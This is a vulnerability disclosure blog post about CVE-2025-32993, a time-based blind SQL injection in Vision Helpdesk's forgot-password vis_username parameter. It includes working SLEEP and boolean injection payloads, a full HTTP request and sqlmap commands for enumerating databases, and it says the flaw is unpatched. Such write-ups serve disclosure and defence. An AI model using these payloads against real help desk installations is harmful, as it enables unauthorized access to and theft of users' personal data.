Open in app

Sign in

Write

Sign in

CVE-2025–32993: Time-Based Blind SQL Injection in a Popular Help Desk Software

nav1n
3 min readApr 14, 2025

During a private security assessment for a hosting-related company, I identified a Time-Based Blind SQL Injection vulnerability in a widely used customer support platform — Vision Helpdesk . This application powers numerous help desk and live chat environments — especially in industries such as government, enterprise IT, and web hosting.

Although the provided scope did not explicitly mark any systems as out of scope, a reckon revealed an exposed instance of the application. Testing confirmed a SQL injection vulnerability in the Forgot Password module (/home/forgot-password endpoint), specifically in the vis_username parameter.

I attempted responsible disclosure to developer multiple times, but the vendor did not address the issue. The vulnerability remains unpatched across all tested versions, including the latest. Alarmingly, the vendor’s own support platform is also affected.

Discovery of the Vulnerability

After observing that the application is built with PHP, I began testing for server-side injection vulnerabilities. The application supports user account creation for tracking support tickets and includes a password reset feature.

To begin testing, I created a temporary account, logged in, and used BurpSuite Interceptor to analyze traffic. After ruling out the login and registration flows as injection vectors, I shifted my focus to the password reset form.

💡 Note: While many deployments appear to have the password reset option disabled in the UI, it can still be accessed directly via:

https://[redacted]/index.php?/home/forgot-password

Vulnerable Parameter & Payload

I tried blind Boolean-based SQL injection testing and identified the vis_username parameter as vulnerable.

Payload used for validation:

vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(6)))mjtc) AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home

This payload induced a ~12-second delay in server response, confirming the vulnerability. The increased delay was likely due to the server triggering multiple internal requests during a password reset.

Observation:
Although the payload specified a 6-second delay, the server response was delayed by approximately 12 seconds. Such amplification is common and can depend on backend processing, database behavior, or application server timeout mechanisms.

Steps To Reproduce:

The vulnerability was successfully reproduced by sending the following payload: vis_username=testuser@test.com” AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND “Dfhc”=”Dfhc&vis_operation=reset_password&vis_module=home.

The server response was delayed by approximately 12 seconds, confirming the presence of the Time-Based Blind SQL Injection vulnerability. It’s noteworthy that the server multiplied the response time by x2, which is considered normal behavior.

HTTP Request (Sanitized)

POST /index.php HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Referer: https://test.com/index.php?/home/forgot-password
User-Agent: Mozilla/5.0 (...)

vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home

Full Exploitation with SQLMap

To automate exploitation, I passed the request to SQLMap using the following command:

sqlmap -r request.txt --random-agent -p vis_username --level=2 --delay=1 --proxy https://127.0.0.1:8080 --dbms=mysql

SQLMap confirmed two injection vectors:

Boolean-based blind:

vis_username=test@tets.com" AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 7301 UNION SELECT 3721) END))--

Time-based blind:

vis_username=test@tets.com" AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND "Dfhc"="Dfhc

Then, using the following command, I was able to enumerate databases and tables:

sqlmap -r request.txt --random-agent -p vis_username --level=2 --delay=1 --proxy https://127.0.0.1:8080 --dbms=mysql -D asd --tables

Impact

  • Remote, unauthenticated attackers can exploit this to execute arbitrary SQL queries.
  • A successful attack could expose or modify sensitive user data, including Personally Identifiable Information (PII).
  • Since the software is widely used in sensitive environments, this poses a significant security risk.

Final Notes

  • The vulnerability has been verified and reproduced multiple times.
  • Vendor was notified, but no fix has been provided as of writing.
  • CVE: CVE-2025–32993.

Thank you

--

--

nav1n
nav1n

Written by nav1n

1.1K Followers
24 Following

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech